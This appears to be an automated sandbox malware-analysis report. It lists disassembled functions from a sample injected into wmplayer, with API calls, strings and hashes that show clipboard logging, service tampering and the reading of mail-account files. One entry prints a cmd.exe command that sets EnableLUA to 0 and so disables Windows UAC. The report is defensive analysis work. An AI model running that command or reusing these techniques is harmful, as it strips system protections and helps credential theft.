                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                            • String ID:
                                                                                            • API String ID: 493672254-0
                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                            Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                            • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                            Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                            Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                            Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                            Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                            • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                            Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                            • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                            Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                            • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                            Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Enum$InfoQueryValue
                                                                                            • String ID: [regsplt]$DG
                                                                                            • API String ID: 3554306468-1089238109
                                                                                            • Opcode ID: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                            • Opcode Fuzzy Hash: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                            Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                            • API String ID: 4036392271-1520055953
                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                            Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                            • API String ID: 2974294136-753205382
                                                                                            • Opcode ID: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                            • Opcode Fuzzy Hash: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                            Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                            • String ID: 0$MsgWindowClass
                                                                                            • API String ID: 2877667751-2410386613
                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                            Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                            Strings
                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                            • API String ID: 2922976086-4183131282
                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                            Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                            Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: pth_unenc$BG
                                                                                            • API String ID: 1818849710-2233081382
                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                            Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
